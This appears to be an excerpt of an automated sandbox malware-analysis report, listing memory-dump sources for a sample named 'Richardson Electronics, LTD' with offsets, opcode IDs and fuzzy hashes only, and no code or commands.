                                                              • Instruction Fuzzy Hash: 8FF06535E84218AFDB49CB99D4486DDBFF7DF84225F14C095E00997250DB785A81C784
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2365c2f89185eb6256da7be5a9aba5e2eeee7b93ac5f3a964c7af2fb146f5247
                                                              • Instruction ID: ef905152eecbaaeb1eb54103c0468c23f750731a55234873ff050531282e00e9
                                                              • Opcode Fuzzy Hash: 2365c2f89185eb6256da7be5a9aba5e2eeee7b93ac5f3a964c7af2fb146f5247
                                                              • Instruction Fuzzy Hash: 76E0D834959304DBCB94DB54D44459DBFB49F85205F24D2D8D80817385C6325D42CFC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction ID: 778daf26e6d44544e29ec42ee864287631821a287b560d2c89c85e567c5172d8
                                                              • Opcode Fuzzy Hash: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction Fuzzy Hash: 32E0C974D04208EFCB94DFA8D5446ADBBF4EB49300F10C1AA9C18A3341D631AA51DF85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction ID: 53fac16d9ed409fd68e3f8938d5aa001fd5ba2ad12c21996435cec980f7464c4
                                                              • Opcode Fuzzy Hash: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction Fuzzy Hash: 9AE0C974D05208EFCB84DFA8D94469DBBF5FB49300F14C1A99C1893380D6319A51DF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction ID: 88d71785337d8ae4558023fa1c68ba4a7695a05988accae05bd671523bed1d33
                                                              • Opcode Fuzzy Hash: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction Fuzzy Hash: A0E0C274E04208EFCB94DFA9D544AADBBF4FB49310F10C1AA9C68A3340D6369A51DF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction ID: 853375760cf1f93d2dda8800bb4d4f388354cf62996e369f314a600716da9ab9
                                                              • Opcode Fuzzy Hash: bdc010dc6167145f9ea4b8e8109e93edf70e60645aa7dd74cea0b2d93c0c4e79
                                                              • Instruction Fuzzy Hash: C7E0E574E04208EFCB94DFA8D544AADFBF4FB49301F10C5AA9C18A3350D6319A51DF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb8f92cdc6aa66de4f55052b19752b9e3c2ea28c39eff3d2867cc6f8fa7caf76
                                                              • Instruction ID: da92e3e4adc89f495d21d479e8e85b1035711f62fb40857c92df8a109e30b470
                                                              • Opcode Fuzzy Hash: cb8f92cdc6aa66de4f55052b19752b9e3c2ea28c39eff3d2867cc6f8fa7caf76
                                                              • Instruction Fuzzy Hash: 41F03274C04248EFDB40CF98D801AADBFBAEB48300F14C1AAEC1856350D7329A61EB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c3eadd75d63278a1e11053a5f22b04bd6e557b4f653e7feff52b47b1c7b35e1
                                                              • Instruction ID: 8e3928b4ba4e16f0b1687738d50eafb26b431456e0f362089812ee8cd63f1fb9
                                                              • Opcode Fuzzy Hash: 4c3eadd75d63278a1e11053a5f22b04bd6e557b4f653e7feff52b47b1c7b35e1
                                                              • Instruction Fuzzy Hash: 6DE0653590420CEFCB04CF94E900AAEBFB6EF48310F148199EC0527291C7329AA2EB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a20681ab7dd803348d5b9f856513745b8de7d263c6c0e8249ce8e76a8f5c5b21
                                                              • Instruction ID: 72e752c1ed63e04f00860c3e675a6e2ab80b736c231e3874214decda266445e3
                                                              • Opcode Fuzzy Hash: a20681ab7dd803348d5b9f856513745b8de7d263c6c0e8249ce8e76a8f5c5b21
                                                              • Instruction Fuzzy Hash: EFE06538914159CBDB24EF68C5157AFBAB1BB88B04F20061EE302B6241CBB50D01CBD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a63c0dcd0e4a42c7f454a67742179e04ca87533594335ea339b30bca1f445a5a
                                                              • Instruction ID: 32e51a370f2ed514c56a689406704a60ce7605b8fe52335a93e6fc872fa6abbb
                                                              • Opcode Fuzzy Hash: a63c0dcd0e4a42c7f454a67742179e04ca87533594335ea339b30bca1f445a5a
                                                              • Instruction Fuzzy Hash: 8EE08C323101109F8318F77CE40886F37E9FBCA660301096EE20ACB3A0DE71EC488791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7beee0e35590c6f84ff0bb8a875ed87b47750f1a86ea247879edf06b3440b826
                                                              • Instruction ID: bb1c8869d8fcba4e19191ca048fd973e50e317b92515b5bd2ae8577349bd9528
                                                              • Opcode Fuzzy Hash: 7beee0e35590c6f84ff0bb8a875ed87b47750f1a86ea247879edf06b3440b826
                                                              • Instruction Fuzzy Hash: 7EE086307C03049BE7D8A6B6CC00BAB3AC59F45714F505065F64A9B2C0DDA1DC41C7E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9da076371cad1707f1103bdbceca72dabdf0d9ba658b139024be0a5d0df6b13f
                                                              • Instruction ID: fe4b945241b5f7abf18649a92e409de5610789dd31d93e43846f006830e5ce0c
                                                              • Opcode Fuzzy Hash: 9da076371cad1707f1103bdbceca72dabdf0d9ba658b139024be0a5d0df6b13f
                                                              • Instruction Fuzzy Hash: 90F0C934EA1228CFEBA08F54D9497D9BBB0EB06355F0154D5D24CA2640D3355AC88F12
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a6ccd91c4285f83b45ed2388aded50256ccd65be6656e2ff1e1ad15d6a308b3
                                                              • Instruction ID: 6cf9fa9c590453205ed28e13a27d2f82e882556641a728c679f01336c8431b08
                                                              • Opcode Fuzzy Hash: 2a6ccd91c4285f83b45ed2388aded50256ccd65be6656e2ff1e1ad15d6a308b3
                                                              • Instruction Fuzzy Hash: 75E0E574E04208EFCB84DFA8D5446ADBBF4EB88204F1081A9991893350D6319A41CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3e86a76354d4d847772401f03e483e58e93a041a0de96ae300f0515fecc717f
                                                              • Instruction ID: 1a223e5c50d95b02706c74af06ecc13287d7aaa17326f12d23bd205467194f01
                                                              • Opcode Fuzzy Hash: a3e86a76354d4d847772401f03e483e58e93a041a0de96ae300f0515fecc717f
                                                              • Instruction Fuzzy Hash: 16E0E570D15248EFDB94DFA8D4446ADBBF5EB48300F5081A9D814A2304D7359F90EF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3e86a76354d4d847772401f03e483e58e93a041a0de96ae300f0515fecc717f
                                                              • Instruction ID: 959c438dd239bf283f829995b4bb02fe89857ef9378b0e91d87c8fcedaea3054
                                                              • Opcode Fuzzy Hash: a3e86a76354d4d847772401f03e483e58e93a041a0de96ae300f0515fecc717f
                                                              • Instruction Fuzzy Hash: D2E0E570D4520DEFDB94DFA8D4056AEFBF5AB88300F1081AAD804A2310D7359A94DF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a6ccd91c4285f83b45ed2388aded50256ccd65be6656e2ff1e1ad15d6a308b3
                                                              • Instruction ID: 3d91d982150bb186bebb3e39849b4356429a7d959361583af6e88859d7468a06
                                                              • Opcode Fuzzy Hash: 2a6ccd91c4285f83b45ed2388aded50256ccd65be6656e2ff1e1ad15d6a308b3
                                                              • Instruction Fuzzy Hash: 12E0E574E04208EFCB84DFA8D5446ADBBF4EB48200F10C1E9991893340D6319A42CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84562087a467aa7046ad97e21f0dd3196bbf292a7fe6bb795779beeddff1ae3e
                                                              • Instruction ID: e72589d76439cb254e8db96fbf22151f269f6d3a570fe3c323522cf23489b3f9
                                                              • Opcode Fuzzy Hash: 84562087a467aa7046ad97e21f0dd3196bbf292a7fe6bb795779beeddff1ae3e
                                                              • Instruction Fuzzy Hash: 5BE0E574D05308EFCB94DFA8D4046ADBBF8EB48300F10C6AA9914A3300D7759A90EF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e33d2d9a60a2070cb51a1a9c51b1a90067afe872c55b279a160a4d43c1551cec
                                                              • Instruction ID: 27f7ccb3b526164f8d12b31bcd8f34b71ffe2ffa8c636f25798895cc18aa284c
                                                              • Opcode Fuzzy Hash: e33d2d9a60a2070cb51a1a9c51b1a90067afe872c55b279a160a4d43c1551cec
                                                              • Instruction Fuzzy Hash: 24E0E535908208EFCB45DF94E945AADBF76EF49300F148199FC0426251C7728EA1EB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f41098533a949218e8715b866cda1935830fcfa274e99084806e563b3fd73328
                                                              • Instruction ID: a136688b74c5b5b60cf671bccff3bb2f7db87ba117f6e2868046fd8b05c7ea96
                                                              • Opcode Fuzzy Hash: f41098533a949218e8715b866cda1935830fcfa274e99084806e563b3fd73328
                                                              • Instruction Fuzzy Hash: 22E0E574E44208EFCB84DFA8D5446ADFBF8EB48200F1081A9981893341D6319A42CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b65e1ad60333f1c656f5462a07ae9ffb54a898be3c6c9daf4e2e95f81193d1ba
                                                              • Instruction ID: 16304a7183fc3c0297424e22b071c951c8cca94910b5d9204c5e3fe40cd1f6b9
                                                              • Opcode Fuzzy Hash: b65e1ad60333f1c656f5462a07ae9ffb54a898be3c6c9daf4e2e95f81193d1ba
                                                              • Instruction Fuzzy Hash: 7EE08674908218EFC744DF94D546A6DBBB8AB86300F14819DDC4457381C6319F41DB94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bd93cedce35d15036ca36d2b798a5c64d6e03ebc0b2d127db4551f1f82480b
                                                              • Instruction ID: 61995ee62329021a76b77d22995d5626386e57d34366515134a438dac2575bb9
                                                              • Opcode Fuzzy Hash: a4bd93cedce35d15036ca36d2b798a5c64d6e03ebc0b2d127db4551f1f82480b
                                                              • Instruction Fuzzy Hash: 92E01A74D0530CEFDB94DFA8D40529EBBF5EB48300F1089ADC818A3300D6759A85CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17b8d677ca2d046675371db6abcf842f05cc1489a306d1bf9e99086547c4705d
                                                              • Instruction ID: 6ded17b7ad5d26a72c4bd0af0c29fd384fe2ed26b0204897322c96efc0764c56
                                                              • Opcode Fuzzy Hash: 17b8d677ca2d046675371db6abcf842f05cc1489a306d1bf9e99086547c4705d
                                                              • Instruction Fuzzy Hash: 4FF0BC74955258CFEB61CF28D8447ACBBB2BB0A308F5441A9D949A2285CB754E888F04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 353fa34a113226e752855bc3237bf5cdd80fec667ae7399fa3e5f394b6d296ec
                                                              • Instruction ID: 78519c33a67bfc2ba237a719fd559f7585422a0a4e4f9aacb42c68e249e9b0dc
                                                              • Opcode Fuzzy Hash: 353fa34a113226e752855bc3237bf5cdd80fec667ae7399fa3e5f394b6d296ec
                                                              • Instruction Fuzzy Hash: E1E0E574D44208EFCB94DFA8D544AADBBB4AF88214F1481AA9C5857381C6319A51DB84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 997f3ba3a91e9ded5fdcdabf1c94e23f7507df2360e3310e9da4570559c92c02
                                                              • Instruction ID: c6a782af020e817cb63089cd5fc6a362f00d2ef2d312aa1ecdd06219a6fa8ffc
                                                              • Opcode Fuzzy Hash: 997f3ba3a91e9ded5fdcdabf1c94e23f7507df2360e3310e9da4570559c92c02
                                                              • Instruction Fuzzy Hash: 0DF0F874950258CFEBA1DF14D8547ADBBB2BB0A304F5481E9D589E3340DB754EC89F14
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98dfab8fa215b1626a68e7b3eedd0607ab1fa91d9785aea45bfed4a1f34b5b42
                                                              • Instruction ID: db70f97cd8ef7bc328cd542f3fc176e89778e05ac9a925350e816fae95a18bbc
                                                              • Opcode Fuzzy Hash: 98dfab8fa215b1626a68e7b3eedd0607ab1fa91d9785aea45bfed4a1f34b5b42
                                                              • Instruction Fuzzy Hash: 6EE0C23074D7928FC7169B39EA001A73FE29FC96003054A9FE4CACB206DE34ED068791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f5ccaf668961d378fbd68bdd018d997254092bd9d53aae90f7f436dc8b851b2
                                                              • Instruction ID: 010aefadf78bc41830286a21747668ab3c12fbbcd2a7c73f4a58e9d10f9a3313
                                                              • Opcode Fuzzy Hash: 7f5ccaf668961d378fbd68bdd018d997254092bd9d53aae90f7f436dc8b851b2
                                                              • Instruction Fuzzy Hash: 07E04634D08258EFCB44DFA8D5446BDFBB8EB89200F1481EADC5857381CA31AE42DF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27c7ecb2c6e9b3a4e18f790cee8d27442d930cf50f3e4268108e4058713b2c45
                                                              • Instruction ID: 28791efde7bc1d446c31b39210bd473df4218967ed3368b11ff2104766a8bbeb
                                                              • Opcode Fuzzy Hash: 27c7ecb2c6e9b3a4e18f790cee8d27442d930cf50f3e4268108e4058713b2c45
                                                              • Instruction Fuzzy Hash: 71E08630D14208EFC780DFA8D54875CBBF4EB08200F1040E9CD08D3351DA71AE81CB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf659506ffd05944132d6b9636965d3de61caa809e08f8e462994139fa6ea5d1
                                                              • Instruction ID: 9ff34f5ccffb7760f6e91c55a4f5a0468ff4c1a3c09ca633c60a2bc46270ae86
                                                              • Opcode Fuzzy Hash: bf659506ffd05944132d6b9636965d3de61caa809e08f8e462994139fa6ea5d1
                                                              • Instruction Fuzzy Hash: CEE0C27088A248AFD740DFA4D804AAEBFFC9B45200F0082A9980423240C6305E81DBD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbff3fbe476ee2b172aca8cc2feb630285a7016f5332c2af943aebbe55d4a12a
                                                              • Instruction ID: c7ad31874adad71f81b04a54a27374c1baaaeacecedf60085b59233cd604149b
                                                              • Opcode Fuzzy Hash: dbff3fbe476ee2b172aca8cc2feb630285a7016f5332c2af943aebbe55d4a12a
                                                              • Instruction Fuzzy Hash: DBE08C7584630CEFCB45EFA4D504AADBFB9EB05300F1082A8E80426214CB328A90EB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 819dae7000dcd2777ee377deda8d02893d38f6e149bb5a564a378aa8b42a64b5
                                                              • Instruction ID: c2282cf34246b71e205733fb57dd8e0c6514435bec16a2988bada9ba1ee07fd8
                                                              • Opcode Fuzzy Hash: 819dae7000dcd2777ee377deda8d02893d38f6e149bb5a564a378aa8b42a64b5
                                                              • Instruction Fuzzy Hash: 92E0C234908209DFC744DF98E54566DBBB8FB46300F1081D8CC0927381C7319E42CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fa501f3817b0803cbea4b2f5fae96f0f086a6c2b76956e03d06ca3da7724a6c
                                                              • Instruction ID: a8d86f58a877ecd449b4fc9077554ba2b9de57609c03a2437594241d5aa1c60a
                                                              • Opcode Fuzzy Hash: 2fa501f3817b0803cbea4b2f5fae96f0f086a6c2b76956e03d06ca3da7724a6c
                                                              • Instruction Fuzzy Hash: 13E0EC70D9524CDFDB84DFA8D54A79EBFF8AB04201F1001A99A0893340EA705A84CB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 796bf54002b21f3a5a94f322cb4f442f32d8b78458881ef4bc8204aa8382e320
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 8DE01234949208DFDB44DF94E54566DBBF8EB45304F2482DDDC0917341DA719E82DB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 16e95d53cb490d736890bc40adf71b377e88c7cfa6052591ed8246c486581602
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 28E0C234D08308DFCB44DF94E5446ADBBB8EB45300F1482D8CC0917340D7319E42CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 9f4edcffc546ae77ee3b65e0ef95e68869e5fe42ea31da29599994b5d70ced58
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 2FE08C34948208DBC744DF94E5446ADBBB8AF46304F1082A8980857340CA319E42CB84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: c8034b1904d07e7d69062a56b569e866052170779a7d06e7c5627d7e0da6291a
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 79E0C234948308DFC744DF98E544A6DBBB9EB45300F10C2D8EC0817350C6319E42CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d499befc6c3249be2883e555e5a5bbd75466a0c90e243c1f45c0f80960fcdfe
                                                              • Instruction ID: 3262ba87b72d03bd932959ceb4f10ca4bc5b7a58948d1cf61ebd6851bdac3b16
